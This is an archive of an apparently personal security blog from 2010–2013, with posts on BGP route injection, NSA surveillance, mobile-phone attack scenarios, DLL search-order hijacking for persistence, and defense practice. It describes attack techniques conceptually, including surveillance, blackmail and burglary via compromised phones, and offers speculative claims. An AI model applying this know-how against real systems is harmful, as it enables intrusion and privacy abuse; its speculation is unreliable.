Wednesday, October 2, 2013

bgp route injection == sick recon??

Short n sweet for this post, but I've got one brewing that I think will be pretty good, so stay tuned.  This is just some random food for thought...

So yea, bgp route injection is old news, but that didn't stop issues from coming back later.

I got thinking about this because I was talking to a buddy who runs networks at a company that got popped by everyone's favorite actor(s), Annoying Pwnage Terminators.

If you've ever been on the receiving end of their work, you might've been amazed at the sophistication of the recon.  Spearphish emails are just perfect mimics of the way legit ones look, and after they're in they don't seem to spend nearly as much time searching around for things as your avg pen tester.

The speculation I've heard is that this is due to the fusion of cyber milspec teams, college students, and state intel agencies.  That intel part must account for the uber-recon, right?

Well my buddy mentioned that sometime before the known start point of the breach, there was a route injection event that lasted a small amount of time, and originated from Asia.  He claimed that there was no traffic rcv'd back during that time, so basically packets from his org just routed out to some black hole in asia.

That bit got me thinking...  If you targeted bgp route injection like that, just what exactly would you end up getting from your victim??

The data would be somewhat limited if you weren't sending back ACKs for their push packets, but you could still grab some significant info:

- internal DNS
- internal IP
- email contents
- usernames
- cookies / session id's
- hashes / passwords
- etc??

So armed w/ my theory, I hit up another buddy who works in that space for a living and laid out my theory.  I can't lie, he sounded underwhelmed and didn't seem sold on the idea.  But it still seems interesting, so I figured I'd share.

Dan says there are crazy forensics on bgp injection history, but I think the attack my buddy experienced was from some local asian link (that was connected via mpls or whatnot to the rest of the network), so I'm not sure that type of injection would be captured by the logs.

Anyway, if you do business in that region, and if you've been popped by those crews, and if you can confirm that you saw route injection prior to the attack, feel free to drop me a note and I'll give anonymized updates here.

Until next time, have fun n keep hackin :)

Wednesday, August 21, 2013

late summer smash up

if i don't slam this thing together, i'm just not gonna write it, so here we go.

// PREFACE
(last post was sooo off... as always, your mileage w/ my speculation n theory may vary ;)

// GETYERHEADRIGHT

// OPENING
Gotta start w/ saying I luvz my prez...  just do, that's all.


// SNOWDEN
What a cluster...  The admin is historically pretty hard on whistleblowers, so the way things have played out can't be called a complete surprise.  I think there may be a missed opportunity, b/c it seems like answering the father's request to allow Snowden to remain a free man until his trial was a win/win situation for all.  Try to remember how he's being debriefed by our BFF Mr Putin when you try to work out your argument against that one....  More on the guts of that story later.


// MANNING
The same way you might argue that the Snowden whistleblowing could've (mayyybe) advanced the speed and substance of the discussions about NSA inet spying stuff...  Well maybe Manning advanced the US public's willingness and desire to move away from the two wars we were in.  I know we're peeved he leaked stuff, and wikileaks published stuff, but trying to contain information leaks by punishing the leaker or whistleblower seems like trying to hold water in your hand...  And there was a lot of loose talk about how this giant leak was going to cause terrible amounts of damage, but we're a long way down the road and I'm not seeing the chaos and harm to America so clearly atm...  The world learned a lot of interesting information, and other than the extreme fuck-up of publishing completely unredacted information at the outset (endangering individual lives), it seems like maybe that hasn't been a terrible thing.  Maybe his punishment can be somewhat lightened if you take into account that his actions may have saved lives in a roundabout way...  maybe...  maybe not.  who knows.

I know this guy didn't make it either way...


// HEAT DEATH
Chilly war times seem to be back...  I've heard there are people who see the current 'instability' in Egypt as 'good'...  I cannot comprehend it.  But maybe we should just smile and nod while Saudi tells us to chill while they support the re-installation of the prior egyption regime.  You know, it's just like Bahrain or something...?  I know energy and money and middle east politics are complex, but I still want to believe that core US principles don't waver for those things...  Booooo :(

I heard there are signs that maybe economic aid may be used as a lever...

There are so many low boil conflict zones w/ ethnic issues and poverty that are just ripe for chilly war badness.  Booooo...  If you want to make some blood money w/o the diamonds, invest in your military industrial complex corps for future returns.  Booooo  :-\


// MICRO-MANAGING THE LAW
Corporations are people, my friend.  But for some reason, corps are allowed to do just crazy ass shit.  As a corp, you can get thousands of chickens or turkeys and lock them in a dark room, and pump them full of steriods so they are mutated and couldn't survive outside...  Or you do genetic bioresearch and imitate nature the way a child imitates an adult driving a car... :-\  You can treat those thousands of birds so bad that they go bald from stress, and that's one of the least gross side effects of the way we're making our food today...  crazy...

But if you're just a person, then slowwwww down there partner....

If you own 20 cats, the authorities might just kick down your door and take your animals and take you to court.

Do you want to mix some common household chemicals into a fun little concoction?!?  Well, enjoy maybe being a felon and serving the prison industrial complex forever.  Just google around a little and you can find examples of people having fun with some relatively harmless blowing shit up and being charged with a variety of crimes even up to 'weapon of mass destruction' concerning 'bombs' like mentos in coke bottles.  serious post 9/11 use of police resources, indeed.  some work has been done documenting the disturbing trends in police militarization.

Hate to use the same source for two links, but the rabbit hole goes pretty far in terms of corps being not quite as limited as traditional people when it comes to tinkering with things.

Side note, is the problem here that he had a GPS jammer, or that the airport doesn't use more advanced jamming resistant systems?


// TIN-FOIL HAT ZONE
Alright, sorry, I have to drop by and derp some derp... derp...

Ok, there have been a number of odd plane crashes and emergency incidents.  A lot, but not all, have been Boeing aircraft.

I'm not sure I've heard that any of these incidents couldn't have been caused by computer issues... eek :-\


// TECH MOVES ON
Moving right along, that's what technology is doing in our lives...  And holy crap, you can't validate bitcoins like that or you'll make them into real things! And HOLY CRAP, didn't I see that in COD:BLOPS2?  It seems too easy and unlikely to be legit, but who knows...?  And the best for last, 3d printed food sounds AMAZING!!  (ok, I'm sleep deprived, but srsly the idea of using any type of protein is nifty...)  And wherever there's tech, you know the mil-spec cats are already there...

Oh, tech moves on unless you're at the FSO...


// ZOMG NSA LINKAGE WARNING
Alright, here we go..  The first I heard of this came after the Boston bombings when the FBI admitted they could reconstuct phone conversations back in time, which sounded kinda odd...

Then Snowden came out and claimed responsibility for leaking info about the programs.  At the time, he asked for people to focus on the content, and not make the story about him....  Unfortunately, we probably spent far more time talking about Snowden himself and/or royal babies, rather than talking about the capabilities that the NSA might have, and why they might need those capabilities, and where we might want to draw the line on those types of activities.

It's funny how the companies identified as working with the NSA came out with complete double-speak initially.  They strongly stated to press conferences that they definatively didn't let the government access their servers.  People who understand how some of the tech allegedly works would know that the government could snoop everything with MitM SSL without ever accessing the private servers.  Eventually the story evolved.

And then things started getting silly...  The NSA claimed it was unable to search it's own internal emails, even though they are capable of searching a whole world's worth of emails.

The tough part of this situation is that nothing seems clear.  You have a spook from a family of spooks, who apparently saw some thing(s) so terrible that he had a crisis of such magnitude that he decided to leave his family, and girlfriend, and career, and nation...  And unfortunately, the people who commited the acts that caused him such trouble probably took the very same oath that he did to protect the United States.  So who is really the bad guy here?

What I hear from Charlie (full interview is great!) and others is: working at one of the most secretive places in the world doesn't mean you really know what's going on...  And I believe that.


// THAT'S WHY, SUNSHINE
We aren't protecting the NSA stuff for national security imho.  Well, not in any real logical way.  The terrorists already believe the spooks can do all kinds of crazy voodoo, because their partners in terror are always getting blown up by missles.  That's why the head of AQ was using an IRL courier and living without inet.

We're invoking state secrets because we don't want other nations to know what we can do to them.

But all the other nations are free to (and surely executing on) invest in technology just like the NSA does.  So the strategy of keeping our techniques private probably won't pay off.

I believe the official press conf on the NSA spying stuff included a quote about the 2 leaked programs referred to w/ numeric identifiers "215 and 702".  Ok...  If we're using 3 digit codes here, then is it safe to assume there are at least 10 similar programs instead of two? Or 100?  Or 250?!?  Or what?

Would we really be talking about these programs without a leak?  It's hard to see it.

So just put sunshine on all the stuff, so the public can decide what trade-offs are reasonable.  I've previously advocated for a number of ways to leverage tech for the greater good, in ways that many might initially find uncomfortable (ie: monitoring all cell phones for gunshots and/or screams of terror).  I believe tech can be leveraged for good, but only when people can see and understand how it's being used.

At the moment, we're seeing violations as we peek under the rug...  And it doesn't sound like a small thing.

But things are not trending toward sunshine, rather towards more automation...  It's like a Bourne movie...  Some things that have been outed will be dismantled, and those capabilities will re-emerge in a new shadowy form with a new code name or number, and things will continue.  Boooooo, cynical :(

Don't get me wrong, I believe there have been successes, but do we know the cost?  For Snowden, it appears the cost may have been high enough to throw his life away in order to try to wake us up...?


// DIG FOR DETAILS, BUT DON'T FALL IN
There have been some unusual and odd theories running around about Boston.  I am not getting spun up in conspiracy theories, but I see an interesting side thought.  In the modern day and age, how difficult would it be to plant images in legit journalist HDDs and web sites, in order to manufacture a meta-conspiracy...  You could then point the internet investigators in the right direction, and stand back while they do your work to propogate the story you planted...  crazy, right? :)

So let's talk tech instead.  If you controlled all of the major inet links for a nation, and if you had SSL MitM for most connections...  and nearly unlimited tech and resources...  In my imagination you could create a sensory deprevation tank capable of control and influence that is far more insidious than the controls described in 1984.  An individual could be put in a virtual reality-distortion tank.  Communications inbound and outbound to that person could be influenced in real time.  The subject could be isolated and influenced to communicate with the 'right' people by letting some calls go to voicemall, and delaying texts and emails.  Their web browsing could have dynamic content injections to control their thinking.  Their steaming music streams could be hijacked to influence their mood.  Their computer could crash and act against them at the times to cause maximum disruption.  The sky is the limit when you're imaging the modern capability set...  Some people are starting to understand.


// WE ALL MAKE OUR CHOICES
I recently hung out with 5 cool cats who are part of the 中華民族, but didn't seem like typical 華夏族.  They were very nice to me, and I enjoyed chatting them up, and I learned some cool stuff.  Anyway, they told me that in China, you can't even get to YouTube...

They might've been decent with computers, and I wish I'd had the presence of mind to remind them that the 金盾工程 is reportedly not too difficult to bypass.  And I hear there *might* be some hackers in China... ;)

So then the question becomes, do people who have powers that others don't have bear a shared responsibility for not using those power to help the people who don't have them...

If you can help people like you have basic freedoms that they don't have today, do you owe them that?

If you are drafted into servitude to enslave your brothers, is there really no way you can act to do what you think is right?  Where and how do you decide what you will do to be proud when you see yourself in the mirror?


// WHO ARE YOU?
It seems like I'm not the only one thinking this way...  Take a look at how those crazy scary Anonymous cats used their power FOR GOOD!  And it isn't just a one time thing, they are kinda like that special drop box the SAS has, but they HELP police solve crimes on the side instead of killing people ;)  I've got a good friend who has been concerned about how hacker geeks treat women at conferences and in the office and such, and I guess I think Anon has really stood up w/ these actions on behalf of battered women, so maybe he can have hope...

So does this type of demonstration of power mean that current and future hackers are really becoming a 5th column?  Power grids are shaking, and elites are being called out on BS, and standard quos are being upset.

There will always be things we can't control, but don't we all choose how we add or subtract to this world?  Are we cogs in a machine that enable oppression, or are we the ghosts and gremlins that upset the general order and disrupt how those machines operate?


// ONE FOR THE ROAD
Just a parting shot/thought...  is this what it looks like when you let guys with computers tell guys w/ missles and guns where people are?  Tragically breathtaking...


// PEACE

Sunday, February 10, 2013

Threat Assessment: Red Cell (Christopher Dorner)

[Background]
I'd call this situation fascinating if people weren't dying.  The Dorner situation provides an examination of the risks presented by malicious insiders.  Dorner seems to be a case-study example of the types of threats modeled by Marcinko with his Red Cell antics.  Since he's been on the loose for 48 hours, it seemed worth a look...

Note: I am not an expert, or a shrink, or anything.  Just throwing ideas out there.

[Source]
Info below based on a reading of the manifesto.

[Capabilities]
Subject has demonstrated a willingness and ability to attack and evade. Given the time available to plan this scenario, it is reasonable to expect the subject has multiple safe-houses available.  Subject will probably employ operational tactics that go beyond simple firearm attacks.

[Counter Tactics]
Given the high level of training and education displayed, specifically the repeated references to effective TTP of adversarial forces, it is reasonable to expect that the subject will employ proactive tactics to maximize his ability to both successfully strike and evade capture. Examples include diversion and subterfuge used in support of primary mission execution, secondary attacks to demoralize operational LEO assets, and tactics that create resource/asset drag on operational LEO assets.

[ISR]
It is reasonable to expect the subject continues to actively employ signals and cyber technologies to perform ISR.  Wherever possible, communication via secure technologies should be employed in order to prevent eavesdropping.

[Current Location]
Until the subject is located or attacks again, it must remain a possibility that he has left the LA area, although this seems unlikely.

While rural locations offer many advantages, and the subject is likely at home in outdoor environments in all weather conditions, there are significant disadvantages to rural locations, such as the inability to avoid observation or scrutiny while traveling quickly.

Hiding in plain sight in a dense urban environment may offer significant advantages, such as access to resources and multiple forms of transit.  Subject is likely to employ disguises to minimize chances for recognition.

[Key Observations]
It seems likely that the subject has ongoing access to local LE and federal cyber resources.  Particular attention should be paid to valid logins coming from the SOCAL area that have collisions with other valid login timings and operating patterns.

Due to the physical size of the subject, he may choose to move primarily at night to minimize observation.

Expect trickery and subterfuge.  The subject believes himself to be in control of the situation, and will attempt to lead LE assets astray to continue operating towards his primary objective.  Don't be too quick to follow obvious paths with all available resources when capture seems likely or imminent.

Expect subject to be armed at all times, possibly with a silenced weapon.  The subject will be dressed in a style that supports a holstered concealed weapon.


[A Note to the Subject]
Don't kill me, bro.  ;)  You laid out that whole "don't even bother to profile me" thing, as if it were impossible.  In your report, you make it clear that your anger is specifically directed at LAPD for taking everything you had.  Unfortunately you're utilizing federal training to take your revenge, so you're betraying the oaths you've taken.  Your mom was correct, sometimes bad things happen to good people.  You are driven to this to regain your name, so the only path forward is to use your skills to escape and evade and build a new life.  You can only destroy with violence, it won't let you build a better reality within LAPD, like you hope it will...


More Modern Governing

I'd been sitting on this post for a bit, and then unfortunately this happened and became a thing...

According to reliable sources, Swartz was driven to abandon hope for his future when he acted like an activist and broke some laws, and was facing 35 years in prison.

In my opinion, this tragic outcome is just another sign of how our government is failing to keep pace with the realities of technology in the modern world.

We have a system where re-elected prosecutors worry about looking soft on virtually any category of crime, and hesitate to make reasonable deals to allow citizens who briefly lose their way to repay a debt to society and move on with a life that is generally unblemished in the eyes of the law.

When convicted of any felony in the US, some of which area easy to accidentally do, one faces a lifetime of punishment.  Abandon all hope of future employment for those who wear the scarlet "F".  And more and more, even misdemeanor convictions can haunt you.

Similarly, a drunken poor decision to urinate behind a bush can brand you as a convicted sex offender for the rest of your days.

We drive people to undesirable outcomes when we ruin the hopes they place on their future lives.  The reason the phrase "paid his debt to society exists" embraces the concept that we want those who lose their way to be able to regain the good path.

And the joke of it is that there is a real problem with digital law breaking in the modern age.  Credit-card and other information theft is generally trivial to accomplish, and there are plenty of people out there living it up with money coming out of the credit card companies and small businesses (who eat costs sometimes).  And the fact is that these people face limited risk of being caught and punished despite repeated or massive abuse.

So when we catch an activist who is clearly not in it for the money, we throw the book at someone who helped create the digital world we love.

The part that is hardest to swallow is that when it comes to generating revenue, it appears that government is all about embracing a new technical world.  My local PD and govt employ automagic ticket writing cameras that must be reaping dividends when they're hitting people for $100+ for every failure to fully stop on a red for a right turn...

And recently I snagged this pic of what appears to be an auto-license plate scanner on a local PD cruiser:

I assume this will make ticketing easier for a variety of infractions.

The executive and judicial branches embrace technology when it comes to putting your embarassing life details on the internet as well.  For years now people on the interwebz have been lulzing at funny mugshots.  Criminal databases are often public, and some states put all court cases online so everyone can know things you might otherwise consider private.

And yet, when it comes time to "re-elect" judges it seems like there is no concept of openness.  It seems rare to find any transparency of why a given decision is made, so you end up with internet articles full of raging outbursts about why someone should've been punished more, or how on earth could someone like this get off so lightly?!?  if a judge is serving in a public capacity, and if my mistakes are open to the world at large, why shouldn't everyone be allowed to access the information behind judicial decisions and outcomes?

There are a lot of areas where technology could have significant impacts on pursuing justice.  For example, it seems likely that cell-phones could be programmed to automatically capture information and contact authorities when they detect gunshots and/or screams via integrated microphones.  This could probably be done in software with checks and balances, and reduction of false-positives (ie: movies).  Some people might consider that an invasion of privacy, while others might point out that it could save lives.

There are a lot of opportunities and choices ahead for all of us in this space...  it's a shame Aaron won't be around to help us build the future.  In my opinion, he should've been fined and placed on probation and allowed to live his life.


Saturday, October 13, 2012

ramblin on, ain't saying nothin

.:[ktxgoogle]:.
so you can use the google safesearch diagnostic to check out what google has to say about the security of a given domain.  nifty!.. n maybe those google cats are a little too honest? ish?


.:[ktxwhatev]:.
it's tough to know what to say about the nsa wiretap case getting dismissed...   nice try eff...

i was talking w/ someone recently who was going on about how there are still significant constitutional barriers between foreign and domestic surveillance... yea, whatever you say...

so here's a shout to a great prank: 



.:[ktxphone]:.

mobile malware is getting pretty crazy creative, at least in the lab ;)  3d maps of whatever your phone can see.  i think there's a lot of potential for stuff in this space...


.:[ktxattackers]:.

i'd be willing to bet this attack exploited a binary planting vuln of some type...  it's nifty how the attacker was probably leaning on the valid sig on the service executable to throw off investigators.  i imagine that the dll was basically just an unwrapper, and the third file maybe had an extension that isn't generally subjected to much attention by av/scanner tools...


Thursday, June 7, 2012

mobility speculation

[preface]
been talking less and doing more, as the decreased frequency in posting might imply...  hopefully i'll have something to share soonish, and will also try to share some good stuff made by other peeps too.  before anything, i want to say that there are giants who've come before me, and if i couldn't stand on their shoulders i wouldn't be able to see or accomplish much at all...  big ups to those who are working, researching, publishing, talking, sharing, and schooling!

a year or two ago 'mobility' was the buzz word to use if you were a security vendor trying to sell some FUD... solutions seemed lacking... i don't hear as much about mobility today, but it doesn't seem like the threat has diminished...

[chess]
so there's this fable about taking a grain of rice, and doubling it for each square on a chess board...  when you get to the second half of the chess board, the numbers just get crazy...  someone pointed out that if you look at moore's law, today we're somewhere around the 30th or 31st square on the board...

this post is about the mobile space taken in that general context...

[mobile]
a couple years back i was lucky enough to kick it in some swank vegas suite w/ a bunch of smart peeps...  we shared drinks and shot the breeze, and it was a pretty good time.  i talked to this cat from berlin who was/is active in the mobile space, and when i asked how long i had until i needed to really worry about my phone, he told me probably 12-18 months...

based on how things have played out since then, it doesn't seem like he was too far off...  the mobile sploit space seems to be quite interesting and active.  looking at the talks given at past conferences, it seems like there are a lot of ways to do a lot of damage...  and what i'm hearing about upcoming cons is that the mobile space is crowded full of people itching to talk about how they can pwn your phone.

[target space]
mobile seems like a great platform to attack for a number of reasons:

- ubiquitous coverage: phones are almost everywhere you go
- limited target platforms: android, iphone, ... umm... ummm... something else?
- reliability: phones are pretty much always on, and always connected
- flexibility: phones can communicate across so many channels...  sms, direct tcp/udp over 3g/4g, http, etc....
- ignorance: most ppl have no idea what's going on w/ their desktops, laptops, and servers...  visibility into phones is significantly worse

- uncleanable!: not like there are many tools at your disposal to clean your phone...  but try this out for fun...  back up your contacts and whatever, and then 'factory reset' your device...  well, i haven't tried an iphone, but on android...  well, you might notice that after the reset your phone *did not* go back to the state it was in after you bought it.  all those software updates your provider pushed remained in place even though all the trivial user stuff was reset.  this means that the memory that stores that 'good state' is writable.  if someone roots your phone, it doesn't seem like anything is preventing them from writing their pwnage there, and thus gaining persistence on your mobile platform... ug!

[so wtf are you talking about?]
just rambling about mobility attack and defense...  so here are a few ideas about how you could use mobile platforms in ways not intended by mobile carriers; first some simple ones, and then some that are maybe more complex...

[simple mobile attacks]
- surveillance: i pwn your phone, and now i know a *lot* about you...  i can listen w/ your microphone, so i know what you're saying, and who you're screwing.  i can take pics n vid w/ your camera(s), and even though that's usually just the inside of your pocket, i can still get a lot of good stuff if i'm persistent or if i use programming to watch for changes before i capture anything...  so i know where you go, and what you do, and who you talk to, and all that good stuff....

- blackmail: since i know all that stuff, and since you have plenty of vices and secrets and lies in your life, i can blackmail you pretty easy...  well, most of you ;)

- virtual theft: hey lookit, you use your smart-phone for all kinds of things...  i can keylog and get all kinds of passwords and such, and abuse you w/ all of that...

- spam: i use your connectivity to send my messages, and since ppl believe and click that shite, i make $$$...

[complex-ish mobile attacks/capabilities]
- research foo: some peeps are talking about using mobile phones as mass detection and reporting platforms...  including simple sensors and things like that to enable near-real-time detection and reporting...

- physical/IRL theft/crime:  since i can watch and listen and track everything someone does, it makes crime wayyyy easier.   looking through your calls and txts let's me konw who you interact with, and who you live with.  i can find their numbers and pwn them too.  then i can wait until you're all away from the house somewhere far away, and maybe even wait until your neighbors aren't around too (or are sleeping, or are otherwise distracted) and then rob your house

- area surveillance:  imaging you're the criminal above, or maybe some type of operator on a secret mission...  by monitoring all the phones in a given location, you can get an idea of whether or not anyone heard you break that window, or whether they are calling the police.  you can know what the people around you are seeing, hearing, and thinking...

- covert signal piggybacking for anonymous comms:  ever see one of those videos demoing how you can spoof a cell phone base-station and intercept the comms of any nearby phone?  well in theory it seems like you could do the same thing but be way more passive about it.  it seems like you could captivate all local devices and then use a communication protocol that is capable of packetizing a communication stream and splitting it across multiple channels to arrive at the same destination.  by sending your signal chopped up across multiple devices, it could be very difficult to trace back who originated the signal...  it might not be optimal for two-way communications (although that might be possible), but for a single directional xfer, it should work nicely.  one could imagine purpose built devices with a wireless antenna and ethernet jack that allow a person in an environment with an oppressive regime to communicate freely by hitching a ride on the signals of nearby mobile devices...  many governments (both oppressive and freedom loving) are investing in reducing the ability of average citizens to communicate anonymously.  if a session could be parsed and split across multiple carriers and multiple connections, it seems that would become significantly more difficult to track and suppress....

[solutions]
i haz no great ideas on how to make better software...  but as far as i can figure, one potential solution for improving mobile security is for phones to include physical switches/toggles that act as kill switches for given services.  flip switches on your handset to activate/deactivate things like 3G, camera, microphone, gps... this simple idea would at least give consumers and phone owners the power to feel relatively confident that phone features aren't being used if they don't want them to be...  yes, the idea is pretty simple and lame, and no it will probably never happen...

Monday, October 3, 2011

'confused deputy' persistence mechanism: binary planting

so this is not a new idea really, but mb worth a little thought/exploration...

most of the recent-ish binary planting research seemed to focus on remote code execution attacks. but sometimes you don't need remote root.

some ppl say this attack is old news and lame, but then other people say 'whatever lands me shell'... binary planting came up in the adaptive pentest talk at DerbyCon, and maybe even Mitnick is using it (as also mentioned in a Derby talk). so whether or not you think it is lame, it appears ppl are using it.

a few weeks back i was digging around w/ binary planting in terms of priv escalation (which coincidentally got kicked around on FD recently)...

if you don't need CWD to win, then the set of potential DLL load attempts changes a bit. lots of apps run on boxen out in the world run w/ elevated privs, so maybe there's something to leverage there. specifically pretty much any DLL load attempt that doesn't find a target could be interesting. but even back on XP the default file perms and the landing place of most DLL loads limits the attack surface available to a non-admin user. so i kinda walked away from priv escalation w/o much success.

but maybe you've got root on a box. now you want your code to persist and exec through reboots. being tricky and hiding can be nifty, but hiding in plain sight can work too. home users don't pay a bunch of attention or have a ton of knowledge, and big environments are often resource constrained and no where near tracking detailed state on their endpoints (integrity checking, etc).

when you're digging for someone hiding under those conditions, sometimes you want to check machines for ways they automatically exec arbitrary code. so you dig through the registry and some folders, and look at core system files... and, well, it's kinda a lot of work...

so after i re-read some of Nick Harbour's thoughts on the issue, i think he already covered this pretty well, and really alluded to the potential magnitude and complexity of this situation...

but i guess i'll add a couple thoughts. first off, Nick seems to mostly consider the issue within the OS realm, but in IRL situations deployed apps give a much larger potential surface. and like the Acros peeps point out in some of their research, there are a number of DLL loads which are pure misses (ie: the DLL doesn't reside on the system, but the system is running fine). if you're search-order hijacking a core system DLL, an investigator can hone in on duplicate DLLs, or maybe where a stub is calling the other DLL to maintain required system functionality.

but a casual review on win7 and winXP found a number of 3rd party apps that miss on calls to non-existant DLLs during normal operation. if you're hiding on a box which is regularly used by a user, there are plenty of opportunities to maintain persistence (often) without going anywhere near System32, because the apps used by the user or loaded by system administrators will happily exec correctly named files in the right location (hence the confused deputy). since the system runs fine without the DLLs in the first place, it seems like lots of these apps produce no error messages or other obvious evidence when they call a DLL which doesn't do what it was hoping for... since it's DLL hell already, one wonders how much solid version and checksum information is really available...?

and to loop right back to the privilege escalation issue... in a more modern OS where privilege escalation isn't as easily accomplished, getting your code through a user-initiated MS Office load might get you a non-admin shell where a given priv escalation technique fails. but when exploiting a missed load from a modern commercial AV product and getting a non-admin shell, the same priv esc technique pulls root...? kinda want to research that more... the "Anti-Virus" product remained blissfully unaware that it had been co-opted and was now the persistence mechanism which maintained a compromised state on the victim machine... sloppy DLL loads and no tracking of it's own integrity... go figure.

not every DLL miss is a gem, but the attack surface seems pretty broad after some quick digging... browsers, media viewers, security/privacy apps, productivity apps, backup apps, etc...

the advantage to the attacker here is that the attack surface is broad and murky. app DLLs are generally not as well documented as OS components. there are more versions and less info.

plus if you change the way you look at it, maybe you don't need the code to exec on boot. if the code execs when the user performs an action, or once a week when a scan is run, the end result for the attacker is the same but now the defender has a whole lot more to look for. this isn't really a 'universal' attack method, b/c it is dependant on the app deployment posture of the environment being attacked, but even that becomes an attacker advantage b/c they aren't hiding the same place everytime. and then on the flip-side, in a given org maybe the vulnerable app is widely deployed.

anywho, check it out and see what you think :)

Wednesday, July 6, 2011

late spring-cleaning mash-up ramblings

.:[Contemporary Attack & Defense: Lulz Teez Peez]:.

If you can not be kind, at least have the decency to be vague
By 渍 (stains)


soooo, The-State-Run-Attack-Group-That-Shall-Not-Be-Named is pwning all over... and so are plenty of other attack groups... prolly even the most nimble and motivated orgs are working hard to keep up.

some industry statements are so WTF!?!... it can be tough to tell FUD vs ignorance...?

afaik, there isn't a wealth of sharing when it comes to effective defense tactics/techniques/procedures. it is arguably important to protecting some effective defensive TTPs, but certain norms are common and fatal and not often dealt with:

  • admin rights
  • pervasive broad access which often isn't auditable, much less monitored in near real time
  • feeble patching policies
  • laughable vendor-"driven" "remediation" via "anti-virus" "quarantine"
  • virtually non-existent internal segmentation
  • weak controls and non-existent near-real-time visibility on egress flows
  • virtually no control or integrity concerning the processes and executables on systems across environments large and small

imho, lulzsec gets a +1 for doing the world the service of unignorably highlighting the fact that 'dedicated attackers' can kick a lot of our asses in no time flat. some might be uncomfortable w/ that fact, but how can you ignore it? that hackolution was just tweetivized... ;)


.:[Balance in the Waves of Attack & Defense: Frivolous Musings]:.

It may be that your sole purpose in life is simply to serve as a warning to others
By 士松 (Shisong)



improvement in attack has been exponential while defense has been linear...

attack:
  • tons of excellent education opportunities
  • glamorous pen-test consultant lifestyle
  • top-tier exploit r&d shops for ninja
  • howto? take your pick: app attacks, social eng, os attacks, rented attacks, etc
  • multiple state & independent movements w/ differing and/or overlapping agendas/motivations
  • wide variety of white/grey/black profit opportunities

defense:
  • vendor hell
  • academic & CEH/CISSP ivory towers
  • individual security controls have limited effectiveness and are generally "expensive"
  • some reversing crews understanding and/or combating modern malware
  • a few outspoken 'mainstream' (?) voices (Herzog, Kaminsky, Potter, etc) continue to press to improve on the status-quo clusterfuck known as "defense-in-depth"
  • listening to environments and effectively processing data quickly into simple relevant information is arguably a key weakness


defense needs improving if just because it is significant commitment and work to try to effectively secure a small simple environment...

my shameless but short-winded manifesto(*) on maybe improving defense:
  • K.I.S.S.
  • intimate knowledge of what/why you permit & deny the rest
  • work w/ what you have (free-ish) first
  • push security roles and accountability to existing accountable admins, not to security orgs that shadow the IT org
  • get good at effectively parsing vast datasets into actionable and relevant information

(*): please note that the author does not claim to implement any of this effectively

as for long term improvement, gotta say +1 to mudge for highlighting the need for simpler execution environments in his shmoo keynote.


.:[Future IRL Attack & Defense: Reflections & Predictions]:.

所有的資產,在不被諒解時,都成了負債
(All assets, when misunderstood, become liabilities)
By 欣侑欣侑欣侑欣侑 (Xinyou/Urges Joyful)



.:[+]:. years ago while reading "Secrets & Lies", i was struck at the insight that inet crime mimics many aspects of IRL crime but w/ certain restrictions removed (geographic proximity, repeatability, etc)... so if IRL crime influenced inet crime, could the inverse happen? perhaps the pervasive access to knoweldge as well as the ability to acquire virtually any required component may someday empower independent sophisticated IRL attack groups in accomplishing awe-inspiring feats of IRL crime... and/or vigilantes?

.:[+]:. the deep integration of technology into the fabric of society will inevitably breed and empower a somewhat anarchist element which will not respect borders, governments, and various bothersome restrictions... a class in society which picks and chooses whether or not to follow certain norms and rules, and could perhaps literally open doors which are closed to the average person...


.:[EOF+n]:.

幸福不是一切,人還有責任。
(Happiness is not everything, people have a responsibility)
By 文佩齊華 (Wen Peiqi China)


.:[+]:. doing stuff beats talking about it... so hopefully you all will hear less from me ;)

.:[+]:. to sslvis users: legit or malicious, you keep killing my terrible inefficient kludge back-end "app"... by... using the app :) i'm honored to have so much participation!!! tons of features could improve the app, i will try to make some progess after the next major milestone on the current project... yes, i know it's been over a year since the craptastic alpha was released, sry i am full of the suck :-\

.:[+]:. greetz & respect to all the amazing attackers & defenders i've been honored to share proximity with in the aether... i'm trying to keep up w/ school, but there's ppl setting a wicked pace on all sides!

.:[+]:. and thanks for reading along, and also for the comments... was getting a lot for a while, but they almost all included sketchy links so i mostly managed to keep them un-posted despite a few that slipped through ;) but i enjoyed reading them, so super belated greetz (in no specific order) to the peeps published and/or quoted as well as: 欣侑欣侑欣侑欣侑, 王辛江淑萍康, 楊愛惟, 色情成人卡通漫畫圖, MinB2139, 惠邱邱邱邱雯, 靜錢錢錢怡錢錢錢錢, 阮艳, 文佩齊華, 敬周喜, 嘉王偉, 陳佑發, 佳皓佳皓, 盈廖生家秀蔡, 吳婷婷, 雅莊王edgd春2蕙婷余惠其, 筱婷筱婷, 峻龍, 怡潔怡潔, 慶天慶天, burtong, 林尹, & 秀葉 :D



天下沒有走不通的路,沒有克服不了的困難,沒有打不敗的敵人。
(There is no dead-end road, there are no insurmountable difficulties, there is no enemy to fight who is undefeated)
By 楊宜婷俊嘉 (Yang Yi Ting handsome fine)

Wednesday, November 3, 2010

fragile software systems & risks in homogeny

well there are some things which reportedly do not belong on blogs... grrr... so here's some more of the drivel you've come to expect ;)

this here is one of those 'not sure if i should laugh or cry' links:

the most advanced fighter in the world ... was able to rack up an impressive 241-to-2 kill ratio [during war-games] ... [but] was felled by the International Date Line (IDL) ...

When the group of Raptors crossed over the IDL, multiple computer systems crashed on the planes. Everything from fuel subsystems, to navigation and partial communications were completely taken offline. Numerous attempts were made to "reboot" the systems to no avail ... the Raptors had their refueling tankers as guide dogs to "carry" them back to safety ... They had no communications or navigation


summarized pseudo misquote: "aircraft which cost $125+ million USD apiece were [disabled by] a few lines of computer code"

the F22 IDL story made me wonder if the F/A-18G that 'killed' an F-22 was able to do so particularly because of electronic warfare capabilities...? no idea, but i'd love to ask that Grizzly driver ;)

there might be a couple of take-aways here...

#1 - increasing reliance on critical computerized systems which are not backed by redundant systems and are fragile will present significant new risks. think about the F-22 design philosophy versus my favorite airborne weapons platform: the hawg!

the A-10 has "triple redundancy in its flight systems, with mechanical systems to back up double-redundant hydraulic systems ... [and] is designed to fly with one engine, one tail, one elevator and half a wing torn off." you don't have to google far on the A-10 to find a variety of stories about how well it performs under the stress of combat operations. reportedly, "the 165 Warthogs that flew in Desert Storm [had a] 95.7% mission capable rate ... the highest sortie rate of any USAF aircraft ... [while] roughly half of the total A-10 force supporting Desert Storm suffered some type of battle damage ... [just] five A-10s were lost in action".

yes, physical survivability is very different than electron system fragility, but there may be parallels. if the F-22 is tough to target with traditional weapon systems, maybe a better approach is a big ass radio antenna and a decent fuzzer ;)

